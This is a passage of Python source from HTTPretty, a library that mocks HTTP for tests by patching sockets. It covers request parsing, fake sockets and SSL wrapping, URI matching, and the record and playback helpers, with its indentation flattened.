query string you will need to get it manually like:
``body`` -> the request body as a string
``parsed_body`` -> the request body parsed by ``parse_request_body``
.. testcode::
>>> request.querystring
{'name': ['Gabriel Falcao']}
>>> print request.querystring['name'][0]
"""
def __init__(self, headers, body=''):
# first of all, lets make sure that if headers or body are
# unicode strings, it must be converted into a utf-8 encoded
# byte string
self.raw_headers = utf8(headers.strip())
self._body = utf8(body)
# Now let's concatenate the headers with the body, and create
# `rfile` based on it
self.rfile = io.BytesIO(b'\r\n\r\n'.join([self.raw_headers, self.body]))
# Creating `wfile` as an empty BytesIO, just to avoid any
# real I/O calls
self.wfile = io.BytesIO()
# parsing the request line preemptively
self.raw_requestline = self.rfile.readline()
# initiating the error attributes with None
self.error_code = None
self.error_message = None
# Parse the request based on the attributes above
if not self.parse_request():
return
# making the HTTP method string available as the command
self.method = self.command
# Now 2 convenient attributes for the HTTPretty API:
# `querystring` holds a dictionary with the parsed query string
try:
self.path = self.path.encode('iso-8859-1')
except UnicodeDecodeError:
pass
self.path = decode_utf8(self.path)
qstring = self.path.split("?", 1)[-1]
self.querystring = self.parse_querystring(qstring)
# And the body will be attempted to be parsed as
# `application/json` or `application/x-www-form-urlencoded`
"""a dictionary containing parsed request body or None if
HTTPrettyRequest doesn't know how to parse it. It currently
supports parsing body data that was sent under the
``content`-type` headers values: ``application/json`` or
``application/x-www-form-urlencoded``
"""
self.parsed_body = self.parse_request_body(self._body)
@property
def body(self):
return self._body
@body.setter
def body(self, value):
self._body = utf8(value)
# And the body will be attempted to be parsed as
# `application/json` or `application/x-www-form-urlencoded`
self.parsed_body = self.parse_request_body(self._body)
def __nonzero__(self):
return bool(self.body) or bool(self.raw_headers)
def __str__(self):
tmpl = '<HTTPrettyRequest("{}", total_headers={}, body_length={})>'
return tmpl.format(
self.headers.get('content-type', ''),
len(self.headers),
len(self.body),
)
def parse_querystring(self, qs):
"""parses an UTF-8 encoded query string into a dict of string lists
:param qs: a querystring
:returns: a dict of lists
"""
expanded = unquote_utf8(qs)
parsed = parse_qs(expanded)
result = {}
for k in parsed:
result[k] = list(map(decode_utf8, parsed[k]))
return result
def parse_request_body(self, body):
"""Attempt to parse the post based on the content-type passed.
Return the regular body if not
:param body: string
:returns: a python object such as dict or list in case the deserialization suceeded. Else returns the given param ``body``
"""
PARSING_FUNCTIONS = {
'application/json': json.loads,
'text/json': json.loads,
'application/x-www-form-urlencoded': self.parse_querystring,
}
content_type = self.headers.get('content-type', '')
do_parse = PARSING_FUNCTIONS.get(content_type, FALLBACK_FUNCTION)
try:
body = decode_utf8(body)
return do_parse(body)
except Exception:
return body
class EmptyRequestHeaders(dict):
"""A dict subclass used as internal representation of empty request
headers
"""
class HTTPrettyRequestEmpty(object):
"""Represents an empty :py:class:`~httpretty.core.HTTPrettyRequest`
where all its properties are somehow empty or ``None``
"""
method = None
url = None
body = ''
headers = EmptyRequestHeaders()
class FakeSockFile(object):
"""Fake socket file descriptor. Under the hood all data is written in
a temporary file, giving it a real file descriptor number.
"""
def __init__(self):
self.file = tempfile.TemporaryFile()
self._fileno = self.file.fileno()
def getvalue(self):
if hasattr(self.file, 'getvalue'):
return self.file.getvalue()
else:
return self.file.read()
def close(self):
self.socket.close()
self.file.close()
def fileno(self):
return self._fileno
def __getattr__(self, name):
return getattr(self.file, name)
def __del__(self):
try:
self.close()
except (ValueError, AttributeError):
pass
class FakeSSLSocket(object):
"""Shorthand for :py:class:`~httpretty.core.fakesock`
"""
def __init__(self, sock, *args, **kw):
self._httpretty_sock = sock
def __getattr__(self, attr):
return getattr(self._httpretty_sock, attr)
class FakeAddressTuple(object):
def __init__(self, fakesocket):
self.fakesocket = fakesocket
def __getitem__(self, *args, **kw):
raise AssertionError('socket {} is not connected'.format(self.fakesocket.truesock))
class fakesock(object):
"""
fake :py:mod:`socket`
"""
class socket(object):
"""drop-in replacement for :py:class:`socket.socket`
"""
_entry = None
debuglevel = 0
_sent_data = []
def __init__(
self,
family=socket.AF_INET,
type=socket.SOCK_STREAM,
proto=0,
fileno=None
):
self.socket_family = family
self.socket_type = type
self.socket_proto = proto
if httpretty.allow_net_connect:
self.truesock = self.create_socket()
else:
self.truesock = None
self._address = FakeAddressTuple(self)
self.__truesock_is_connected__ = False
self.fd = FakeSockFile()
self.fd.socket = fileno or self
self.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
self._sock = fileno or self
self.is_http = False
self._bufsize = 32 * 1024
def create_socket(self):
return old_socket(self.socket_family, self.socket_type, self.socket_proto)
def getpeercert(self, *a, **kw):
now = datetime.now()
shift = now + timedelta(days=30 * 12)
return {
'notAfter': shift.strftime('%b %d %H:%M:%S GMT'),
'subjectAltName': (
('DNS', '*.%s' % self._host),
('DNS', self._host),
('DNS', '*'),
),
'subject': (
(
('organizationName', '*.%s' % self._host),
),
(
('organizationalUnitName',
'Domain Control Validated'),
),
(
('commonName', '*.%s' % self._host),
),
),
}
def ssl(self, sock, *args, **kw):
return sock
def setsockopt(self, level, optname, value):
if httpretty.allow_net_connect and not self.truesock:
self.truesock = self.create_socket()
elif not self.truesock:
logger.debug('setsockopt(%s, %s, %s) failed', level, optname, value)
return
return self.truesock.setsockopt(level, optname, value)
def connect(self, address):
try:
self._address = (self._host, self._port) = address
except ValueError:
# We get here when the address is just a string pointing to a
# unix socket path/file
#
# See issue #206
self.is_http = False
else:
ports_to_check = (
POTENTIAL_HTTP_PORTS.union(POTENTIAL_HTTPS_PORTS))
self.is_http = self._port in ports_to_check
if not self.is_http:
self.connect_truesock()
elif self.truesock and not self.__truesock_is_connected__:
# TODO: remove nested if
matcher = httpretty.match_http_address(self._host, self._port)
if matcher is None:
self.connect_truesock()
def bind(self, address):
self._address = (self._host, self._port) = address
if self.truesock:
self.bind_truesock(address)
def bind_truesock(self, address):
if httpretty.allow_net_connect and not self.truesock:
self.truesock = self.create_socket()
elif not self.truesock:
raise UnmockedError()
return self.truesock.bind(address)
def connect_truesock(self):
if httpretty.allow_net_connect and not self.truesock:
self.truesock = self.create_socket()
elif not self.truesock:
raise UnmockedError()
if self.__truesock_is_connected__:
return self.truesock
with restored_libs():
hostname = self._address[0]
port = 80
if len(self._address) == 2:
port = self._address[1]
if port == 443 and old_sslsocket:
self.truesock = old_ssl_wrap_socket(self.truesock, server_hostname=hostname)
sock = self.truesock
sock.connect(self._address)
self.__truesock_is_connected__ = True
self.truesock = sock
return self.truesock
def real_socket_is_connected(self):
return self.__truesock_is_connected__
def fileno(self):
if self.truesock:
return self.truesock.fileno()
return self.fd.fileno()
def close(self):
if self.truesock:
self.truesock.close()
self.truesock = None
self.__truesock_is_connected__ = False
def makefile(self, mode='r', bufsize=-1):
"""Returns this fake socket's own tempfile buffer.
If there is an entry associated with the socket, the file
descriptor gets filled in with the entry data before being
returned.
"""
self._mode = mode
self._bufsize = bufsize
if self._entry:
t = threading.Thread(
target=self._entry.fill_filekind, args=(self.fd,)
)
t.start()
if self.timeout == socket._GLOBAL_DEFAULT_TIMEOUT:
timeout = None
else:
timeout = self.timeout
t.join(timeout)
if t.is_alive():
raise socket.timeout
return self.fd
def real_sendall(self, data, *args, **kw):
"""Sends data to the remote server. This method is called
when HTTPretty identifies that someone is trying to send
non-http data.
The received bytes are written in this socket's tempfile
buffer so that HTTPretty can return it accordingly when
necessary.
"""
if httpretty.allow_net_connect and not self.truesock:
self.connect_truesock()
elif not self.truesock:
raise UnmockedError()
if not self.is_http:
self.truesock.setblocking(1)
return self.truesock.sendall(data, *args, **kw)
sock = self.connect_truesock()
sock.setblocking(1)
sock.sendall(data, *args, **kw)
should_continue = True
while should_continue:
try:
received = sock.recv(self._bufsize)
self.fd.write(received)
should_continue = bool(received.strip())
except socket.error as e:
if e.errno == EAGAIN:
continue
break
self.fd.seek(0)
def sendall(self, data, *args, **kw):
# if self.__truesock_is_connected__:
# return self.truesock.sendall(data, *args, **kw)
self._sent_data.append(data)
self.fd = FakeSockFile()
self.fd.socket = self
if isinstance(data, str):
data = data.encode('utf-8')
elif not isinstance(data, bytes):
logger.debug('cannot sendall({data!r})')
data = bytes(data)
try:
requestline, _ = data.split(b'\r\n', 1)
method, path, version = parse_requestline(
decode_utf8(requestline))
is_parsing_headers = True
except ValueError:
path = ''
is_parsing_headers = False
if self._entry is None:
# If the previous request wasn't mocked, don't
# mock the subsequent sending of data
return self.real_sendall(data, *args, **kw)
else:
method = self._entry.method
path = self._entry.info.path
self.fd.seek(0)
if not is_parsing_headers:
if len(self._sent_data) > 1:
headers = utf8(last_requestline(self._sent_data))
meta = self._entry.request.headers
body = utf8(self._sent_data[-1])
if meta.get('transfer-encoding', '') == 'chunked':
if not body.isdigit() and (body != b'\r\n') and (body != b'0\r\n\r\n'):
self._entry.request.body += body
else:
self._entry.request.body += body
httpretty.historify_request(headers, body, False)
return
if path[:2] == '//':
path = '//' + path
# path might come with
s = urlsplit(path)
POTENTIAL_HTTP_PORTS.add(int(s.port or 80))
parts = list(map(utf8, data.split(b'\r\n\r\n', 1)))
if len(parts) == 2:
headers, body = parts
else:
headers = ''
body = data
request = httpretty.historify_request(headers, body)
info = URIInfo(
hostname=self._host,
port=self._port,
path=s.path,
query=s.query,
last_request=request
)
matcher, entries = httpretty.match_uriinfo(info)
if not entries:
self._entry = None
self.real_sendall(data)
return
self._entry = matcher.get_next_entry(method, info, request)
def forward_and_trace(self, function_name, *a, **kw):
if self.truesock and not self.__truesock_is_connected__:
self.truesock = self.create_socket()
### self.connect_truesock()
if self.__truesock_is_connected__:
function = getattr(self.truesock, function_name)
if self.is_http:
if self.truesock and not self.__truesock_is_connected__:
self.truesock = self.create_socket()
### self.connect_truesock()
if not self.truesock:
raise UnmockedError()
callback = getattr(self.truesock, function_name)
return callback(*a, **kw)
def settimeout(self, new_timeout):
self.timeout = new_timeout
if not self.is_http:
if self.truesock:
self.truesock.settimeout(new_timeout)
def send(self, *args, **kwargs):
return self.forward_and_trace('send', *args, **kwargs)
def sendto(self, *args, **kwargs):
return self.forward_and_trace('sendto', *args, **kwargs)
def recvfrom_into(self, *args, **kwargs):
return self.forward_and_trace('recvfrom_into', *args, **kwargs)
def recv_into(self, *args, **kwargs):
if self.truesock and not self.__truesock_is_connected__:
self.connect_truesock()
return self.forward_and_trace('recv_into', *args, **kwargs)
def recvfrom(self, *args, **kwargs):
if self.truesock and not self.__truesock_is_connected__:
self.connect_truesock()
return self.forward_and_trace('recvfrom', *args, **kwargs)
def recv(self, buffersize=None, *args, **kwargs):
if self.truesock and not self.__truesock_is_connected__:
self.connect_truesock()
buffersize = buffersize or self._bufsize
return self.forward_and_trace('recv', buffersize, *args, **kwargs)
def __getattr__(self, name):
if httpretty.allow_net_connect and not self.truesock:
# can't call self.connect_truesock() here because we
# don't know if user wants to execute server of client
# calls (or can they?)
self.truesock = self.create_socket()
elif not self.truesock:
raise UnmockedError()
return getattr(self.truesock, name)
def fake_wrap_socket(orig_wrap_socket_fn, *args, **kw):
"""drop-in replacement for py:func:`ssl.wrap_socket`
"""
server_hostname = kw.get('server_hostname')
if server_hostname is not None:
matcher = httpretty.match_https_hostname(server_hostname)
if matcher is None:
return orig_wrap_socket_fn(*args, **kw)
if 'sock' in kw:
return kw['sock']
else:
return args[0]
def create_fake_connection(
address,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""drop-in replacement for :py:func:`socket.create_connection`"""
s = fakesock.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
s.settimeout(timeout)
if isinstance(source_address, tuple) and len(source_address) == 2:
source_address[1] = int(source_address[1])
if source_address:
s.bind(source_address)
s.connect(address)
return s
def fake_gethostbyname(host):
"""drop-in replacement for :py:func:`socket.gethostbyname`"""
return '127.0.0.1'
def fake_gethostname():
"""drop-in replacement for :py:func:`socket.gethostname`"""
return 'localhost'
def fake_getaddrinfo(
host, port, family=None, socktype=None, proto=None, flags=None):
"""drop-in replacement for :py:func:`socket.getaddrinfo`"""
return [(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
'', (host, port)),
(socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_TCP,
'', (host, port))]
class Entry(BaseClass):
"""Created by :py:meth:`~httpretty.core.httpretty.register_uri` and
stored in memory as internal representation of a HTTP
request/response definition.
Args:
method (str): One of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``.
uri (str|re.Pattern): The URL to match
adding_headers (dict): Extra headers to be added to the response
forcing_headers (dict): Overwrite response headers.
status (int): The status code for the response, defaults to ``200``.
streaming (bool): Whether should stream the response into chunks via generator.
headers: Headers to inject in the faked response.
Returns:
httpretty.Entry: containing the request-matching metadata.
.. warning:: When using the ``forcing_headers`` option make sure to add the header ``Content-Length`` to match at most the total body length, otherwise some HTTP clients can hang indefinitely.
"""
def __init__(self, method, uri, body,
adding_headers=None,
forcing_headers=None,
status=200,
streaming=False,
**headers):
self.method = method
self.uri = uri
self.info = None
self.request = None
self.body_is_callable = False
if hasattr(body, "__call__"):
self.callable_body = body
self.body = None
self.body_is_callable = True
elif isinstance(body, str):
self.body = utf8(body)
else:
self.body = body
self.streaming = streaming
if not streaming and not self.body_is_callable:
self.body_length = len(self.body or '')
else:
self.body_length = 0
self.adding_headers = adding_headers or {}
self.forcing_headers = forcing_headers or {}
self.status = int(status)
for k, v in headers.items():
name = "-".join(k.split("_")).title()
self.adding_headers[name] = v
self.validate()
def validate(self):
"""validates the body size with the value of the ``Content-Length``
header
"""
content_length_keys = 'Content-Length', 'content-length'
for key in content_length_keys:
got = self.adding_headers.get(
key, self.forcing_headers.get(key, None))
if got is None:
continue
igot = None
try:
igot = int(got)
except (ValueError, TypeError):
warnings.warn(
'HTTPretty got to register the Content-Length header '
'with "%r" which is not a number' % got)
return
if igot and igot > self.body_length:
raise HTTPrettyError(
'HTTPretty got inconsistent parameters. The header '
'Content-Length you registered expects size "%d" but '
'the body you registered for that has actually length '
'"%d".' % (
igot, self.body_length,
)
)
def __str__(self):
return r'<Entry {} {} getting {}>'.format(
self.method,
self.uri,
self.status
)
def normalize_headers(self, headers):
"""Normalize keys in header names so that ``COntent-tyPe`` becomes ``content-type``
:param headers: dict
:returns: dict
"""
new = {}
for k in headers:
new_k = '-'.join([s.lower() for s in k.split('-')])
new[new_k] = headers[k]
return new
def fill_filekind(self, fk):
"""writes HTTP Response data to a file descriptor
:parm fk: a file-like object
.. warning:: **side-effect:** this method moves the cursor of the given file object to zero
"""
now = datetime.utcnow()
headers = {
'status': self.status,
'date': now.strftime('%a, %d %b %Y %H:%M:%S GMT'),
'server': 'Python/HTTPretty',
'connection': 'close',
}
if self.forcing_headers:
headers = self.forcing_headers
if self.adding_headers:
headers.update(
self.normalize_headers(
self.adding_headers))
headers = self.normalize_headers(headers)
status = headers.get('status', self.status)
if self.body_is_callable:
status, headers, self.body = self.callable_body(self.request, self.info.full_url(), headers)
headers = self.normalize_headers(headers)
# TODO: document this behavior:
if 'content-length' not in headers:
headers.update({
'content-length': len(self.body)
})
string_list = [
'HTTP/1.1 %d %s' % (status, STATUSES[status]),
]
if 'date' in headers:
string_list.append('date: %s' % headers.pop('date'))
if not self.forcing_headers:
content_type = headers.pop('content-type',
'text/plain; charset=utf-8')
content_length = headers.pop('content-length',
self.body_length)
string_list.append('content-type: %s' % content_type)
if not self.streaming:
string_list.append('content-length: %s' % content_length)
server = headers.pop('server', None)
if server:
string_list.append('server: %s' % server)
for k, v in headers.items():
string_list.append(
'{}: {}'.format(k, v),
)
for item in string_list:
fk.write(utf8(item) + b'\n')
fk.write(b'\r\n')
if self.streaming:
self.body, body = itertools.tee(self.body)
for chunk in body:
fk.write(utf8(chunk))
else:
fk.write(utf8(self.body))
fk.seek(0)
def url_fix(s, charset=None):
"""escapes special characters
"""
if charset:
warnings.warn("{}.url_fix() charset argument is deprecated".format(__name__), DeprecationWarning)
scheme, netloc, path, querystring, fragment = urlsplit(s)
path = quote(path, b'/%')
querystring = quote_plus(querystring, b':&=')
return urlunsplit((scheme, netloc, path, querystring, fragment))
class URIInfo(BaseClass):
"""Internal representation of `URIs <https://en.wikipedia.org/wiki/Uniform_Resource_Identifier>`_
.. tip:: all arguments are optional
:param username:
:param password:
:param hostname:
:param port:
:param path:
:param query:
:param fragment:
:param scheme:
:param last_request:
"""
default_str_attrs = (
'username',
'password',
'hostname',
'port',
'path',
)
def __init__(self,
username='',
password='',
hostname='',
port=80,
path='/',
query='',
fragment='',
scheme='',
last_request=None):
self.username = username or ''
self.password = password or ''
self.hostname = hostname or ''
if port:
port = int(port)
elif scheme == 'https':
port = 443
self.port = port or 80
self.path = path or ''
if query:
query_items = sorted(parse_qs(query).items())
self.query = urlencode(
encode_obj(query_items),
doseq=True,
)
else:
self.query = ''
if scheme:
self.scheme = scheme
elif self.port in POTENTIAL_HTTPS_PORTS:
self.scheme = 'https'
else:
self.scheme = 'http'
self.fragment = fragment or ''
self.last_request = last_request
def to_str(self, attrs):
fmt = ", ".join(['%s="%s"' % (k, getattr(self, k, '')) for k in attrs])
return r'<httpretty.URIInfo(%s)>' % fmt
def __str__(self):
return self.to_str(self.default_str_attrs)
def str_with_query(self):
attrs = self.default_str_attrs + ('query',)
return self.to_str(attrs)
def __hash__(self):
return int(hashlib.sha1(bytes(self, 'ascii')).hexdigest(), 16)
def __eq__(self, other):
self_tuple = (
self.port,
decode_utf8(self.hostname.lower()),
url_fix(decode_utf8(self.path)),
)
other_tuple = (
other.port,
decode_utf8(other.hostname.lower()),
url_fix(decode_utf8(other.path)),
)
return self_tuple == other_tuple
def full_url(self, use_querystring=True):
"""
:param use_querystring: bool
:returns: a string with the full url with the format ``{scheme}://{credentials}{domain}{path}{query}``
"""
credentials = ""
if self.password:
credentials = "{}:{}@".format(
self.username, self.password)
query = ""
if use_querystring and self.query:
query = "?{}".format(decode_utf8(self.query))
result = "{scheme}://{credentials}{domain}{path}{query}".format(
scheme=self.scheme,
credentials=credentials,
domain=self.get_full_domain(),
path=decode_utf8(self.path),
query=query
)
return result
def get_full_domain(self):
"""
:returns: a string in the form ``{domain}:{port}`` or just the domain if the port is 80 or 443
"""
hostname = decode_utf8(self.hostname)
# Port 80/443 should not be appended to the url
if self.port not in DEFAULT_HTTP_PORTS | DEFAULT_HTTPS_PORTS:
return ":".join([hostname, str(self.port)])
return hostname
@classmethod
def from_uri(cls, uri, entry):
"""
:param uri: string
:param entry: an instance of :py:class:`~httpretty.core.Entry`
"""
result = urlsplit(uri)
if result.scheme == 'https':
POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
else:
POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
return cls(result.username,
result.password,
result.hostname,
result.port,
result.path,
result.query,
result.fragment,
result.scheme,
entry)
class URIMatcher(object):
regex = None
info = None
def __init__(self, uri, entries, match_querystring=False, priority=0):
self._match_querystring = match_querystring
# CPython, Jython
regex_types = ('SRE_Pattern', 'org.python.modules.sre.PatternObject',
'Pattern')
is_regex = type(uri).__name__ in regex_types
if is_regex:
self.regex = uri
result = urlsplit(uri.pattern)
if result.scheme == 'https':
POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
else:
POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
else:
self.info = URIInfo.from_uri(uri, entries)
self.entries = entries
self.priority = priority
self.uri = uri
# hash of current_entry pointers, per method.
self.current_entries = {}
def matches(self, info):
if self.info:
# Query string is not considered when comparing info objects, compare separately
return self.info == info and (not self._match_querystring or self.info.query == info.query)
else:
return self.regex.search(info.full_url(
use_querystring=self._match_querystring))
def __str__(self):
wrap = 'URLMatcher({})'
if self.info:
if self._match_querystring:
return wrap.format(str(self.info.str_with_query()))
else:
return wrap.format(str(self.info))
else:
return wrap.format(self.regex.pattern)
def get_next_entry(self, method, info, request):
"""Cycle through available responses, but only once.
Any subsequent requests will receive the last response"""
if method not in self.current_entries:
self.current_entries[method] = 0
# restrict selection to entries that match the requested
# method
entries_for_method = [e for e in self.entries if e.method == method]
if self.current_entries[method] >= len(entries_for_method):
self.current_entries[method] = -1
if not self.entries or not entries_for_method:
raise ValueError('I have no entries for method %s: %s'
% (method, self))
entry = entries_for_method[self.current_entries[method]]
if self.current_entries[method] != -1:
self.current_entries[method] += 1
# Create a copy of the original entry to make it thread-safe
body = entry.callable_body if entry.body_is_callable else entry.body
new_entry = Entry(entry.method, entry.uri, body,
status=entry.status,
streaming=entry.streaming,
adding_headers=entry.adding_headers,
forcing_headers=entry.forcing_headers)
# Attach more info to the entry
# So the callback can be more clever about what to do
# This does also fix the case where the callback
# would be handed a compiled regex as uri instead of the
# real uri
new_entry.info = info
new_entry.request = request
return new_entry
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return str(self) == str(other)
class httpretty(HttpBaseClass):
"""manages HTTPretty's internal request/response registry and request matching.
"""
_entries = {}
latest_requests = []
last_request = HTTPrettyRequestEmpty()
_is_enabled = False
allow_net_connect = True
@classmethod
def match_uriinfo(cls, info):
"""
:param info: an :py:class:`~httpretty.core.URIInfo`
:returns: a 2-item tuple: (:py:class:`~httpretty.core.URLMatcher`, :py:class:`~httpretty.core.URIInfo`) or ``(None, [])``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.matches(info):
return (matcher, info)
return (None, [])
@classmethod
def match_https_hostname(cls, hostname):
"""
:param hostname: a string
:returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.info is None:
pattern_with_port = "https://{0}:".format(hostname)
pattern_without_port = "https://{0}/".format(hostname)
hostname_pattern = (
hostname_re
.match(matcher.regex.pattern)
.group(0)
)
for pattern in [pattern_with_port, pattern_without_port]:
if re.match(hostname_pattern, pattern):
return matcher
elif matcher.info.hostname == hostname:
return matcher
return None
@classmethod
def match_http_address(cls, hostname, port):
"""
:param hostname: a string
:param port: an integer
:returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.info is None:
if port in POTENTIAL_HTTPS_PORTS:
scheme = 'https://'
else:
scheme = 'http://'
pattern_without_port = "{0}{1}/".format(scheme, hostname)
pattern_with_port = "{0}{1}:{2}/".format(scheme, hostname, port)
hostname_pattern = (
hostname_re
.match(matcher.regex.pattern)
.group(0)
)
for pattern in [pattern_with_port, pattern_without_port]:
if re.match(hostname_pattern, pattern):
return matcher
elif matcher.info.hostname == hostname \
and matcher.info.port == port:
return matcher
return None
@classmethod
@contextlib.contextmanager
def record(cls, filename, indentation=4, encoding='utf-8'):
"""
.. testcode::
import io
import json
import requests
import httpretty
with httpretty.record('/tmp/ip.json'):
data = requests.get('https://httpbin.org/ip').json()
with io.open('/tmp/ip.json') as fd:
assert data == json.load(fd)
:param filename: a string
:param indentation: an integer, defaults to **4**
:param encoding: a string, defaults to **"utf-8"**
:returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
try:
import urllib3
except ImportError:
msg = (
'HTTPretty requires urllib3 installed '
'for recording actual requests.'
)
raise RuntimeError(msg)
http = urllib3.PoolManager()
cls.enable()
calls = []
def record_request(request, uri, headers):
cls.disable()
kw = {}
kw.setdefault('body', request.body)
kw.setdefault('headers', dict(request.headers))
response = http.request(request.method, uri, **kw)
calls.append({
'request': {
'uri': uri,
'method': request.method,
'headers': dict(request.headers),
'body': decode_utf8(request.body),
'querystring': request.querystring
},
'response': {
'status': response.status,
'body': decode_utf8(response.data),
# urllib3 1.10 had a bug if you just did:
# dict(response.headers)
# which would cause all the values to become lists
# with the header name as the first item and the
# true value as the second item. Workaround that
'headers': dict(response.headers.items())
}
})
cls.enable()
return response.status, response.headers, response.data
for method in cls.METHODS:
cls.register_uri(method, MULTILINE_ANY_REGEX, body=record_request)
yield
cls.disable()
with codecs.open(filename, 'w', encoding) as f:
f.write(json.dumps(calls, indent=indentation))
@classmethod
@contextlib.contextmanager
def playback(cls, filename):
"""
.. testcode::
import io
import json
import requests
import httpretty
with httpretty.record('/tmp/ip.json'):
data = requests.get('https://httpbin.org/ip').json()
with io.open('/tmp/ip.json') as fd:
assert data == json.load(fd)
:param filename: a string
:returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
cls.enable()
data = json.loads(open(filename).read())
for item in data:
uri = item['request']['uri']
method = item['request']['method']
body = item['response']['body']
headers = item['response']['headers']
cls.register_uri(method, uri, body=body, forcing_headers=headers)
yield
cls.disable()
@classmethod
def reset(cls):
"""resets the internal state of HTTPretty, unregistering all URLs
"""
POTENTIAL_HTTP_PORTS.intersection_update(DEFAULT_HTTP_PORTS)
POTENTIAL_HTTPS_PORTS.intersection_update(DEFAULT_HTTPS_PORTS)
cls._entries.clear()
cls.latest_requests = []
cls.last_request = HTTPrettyRequestEmpty()
@classmethod
def historify_request(cls, headers, body='', append=True):
"""appends request to a list for later retrieval
.. testcode::
import httpretty
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body='')
with httpretty.enabled():
requests.get('https://httpbin.org/ip')
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
"""
request = HTTPrettyRequest(headers, body)
cls.last_request = request
if append or not cls.latest_requests:
cls.latest_requests.append(request)
else:
cls.latest_requests[-1] = request
return request
@classmethod
def register_uri(cls, method, uri, body='{"message": "HTTPretty :)"}',
adding_headers=None,
forcing_headers=None,
status=200,
responses=None,
match_querystring=False,
priority=0,
**headers):
"""
.. testcode::
import httpretty
def request_callback(request, uri, response_headers):
content_type = request.headers.get('Content-Type')
assert request.body == '{"nothing": "here"}', 'unexpected body: {}'.format(request.body)
assert content_type == 'application/json', 'expected application/json but received Content-Type: {}'.format(content_type)
return [200, response_headers, json.dumps({"hello": "world"})]
httpretty.register_uri(
HTTPretty.POST, "https://httpretty.example.com/api",
body=request_callback)
with httpretty.enabled():
requests.post('https://httpretty.example.com/api', data='{"nothing": "here"}', headers={'Content-Type': 'application/json'})
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
:param method: one of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``
:param uri: a string or regex pattern (e.g.: **"https://httpbin.org/ip"**)
:param body: a string, defaults to ``{"message": "HTTPretty :)"}``
:param adding_headers: dict - headers to be added to the response
:param forcing_headers: dict - headers to be forcefully set in the response
:param status: an integer, defaults to **200**
:param responses: a list of entries, ideally each created with :py:meth:`~httpretty.core.httpretty.Response`
:param priority: an integer, useful for setting higher priority over previously registered urls. defaults to zero
:param match_querystring: bool - whether to take the querystring into account when matching an URL
:param headers: headers to be added to the response
.. warning:: When using a port in the request, add a trailing slash if no path is provided otherwise Httpretty will not catch the request. Ex: ``httpretty.register_uri(httpretty.GET, 'http://fakeuri.com:8080/', body='{"hello":"world"}')``
"""
uri_is_string = isinstance(uri, str)
if uri_is_string and re.search(r'^\w+://[^/]+[.]\w{2,}$', uri):
uri += '/'
if isinstance(responses, list) and len(responses) > 0:
for response in responses:
response.uri = uri
response.method = method
entries_for_this_uri = responses
else:
headers['body'] = body
headers['adding_headers'] = adding_headers
headers['forcing_headers'] = forcing_headers
headers['status'] = status
entries_for_this_uri = [
cls.Response(method=method, uri=uri, **headers),
]
matcher = URIMatcher(uri, entries_for_this_uri,
match_querystring, priority)
if matcher in cls._entries:
matcher.entries.extend(cls._entries[matcher])
del cls._entries[matcher]
cls._entries[matcher] = entries_for_this_uri
def __str__(self):
return '<HTTPretty with %d URI entries>' % len(self._entries)
@classmethod
def Response(
cls, body,
method=None,
uri=None,
adding_headers=None,
forcing_headers=None,
status=200,
streaming=False,
**kw):
"""Shortcut to create an :py:class:`~httpretty.core.Entry` that takes
the body as first positional argument.
.. seealso:: the parameters of this function match those of
the :py:class:`~httpretty.core.Entry` constructor.
Args:
body (str): The body to return as response..
method (str): One of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``.
uri (str|re.Pattern): The URL to match
adding_headers (dict): Extra headers to be added to the response
forcing_headers (dict): Overwrite **any** response headers, even "Content-Length".
status (int): The status code for the response, defaults to ``200``.
streaming (bool): Whether should stream the response into chunks via generator.
kwargs: Keyword-arguments are forwarded to :py:class:`~httpretty.core.Entry`
Returns:
httpretty.Entry: containing the request-matching metadata.
"""
kw['body'] = body
kw['adding_headers'] = adding_headers
kw['forcing_headers'] = forcing_headers
kw['status'] = int(status)
kw['streaming'] = streaming
return Entry(method, uri, **kw)
@classmethod
def disable(cls):
"""Disables HTTPretty entirely, putting the original :py:mod:`socket`
module back in its place.
.. code::
import re, json
import httpretty
httpretty.enable()
# request passes through fake socket
response = requests.get('https://httpbin.org')
httpretty.disable()
# request uses real python socket module
response = requests.get('https://httpbin.org')
.. note:: This method does not call :py:meth:`httpretty.core.reset` automatically.
"""
undo_patch_socket()
cls._is_enabled = False
@classmethod
def is_enabled(cls):
"""Check if HTTPretty is enabled
:returns: bool
.. testcode::
import httpretty
httpretty.enable()
assert httpretty.is_enabled() == True
httpretty.disable()
assert httpretty.is_enabled() == False
"""
return cls._is_enabled
@classmethod
def enable(cls, allow_net_connect=True):
"""Enables HTTPretty.
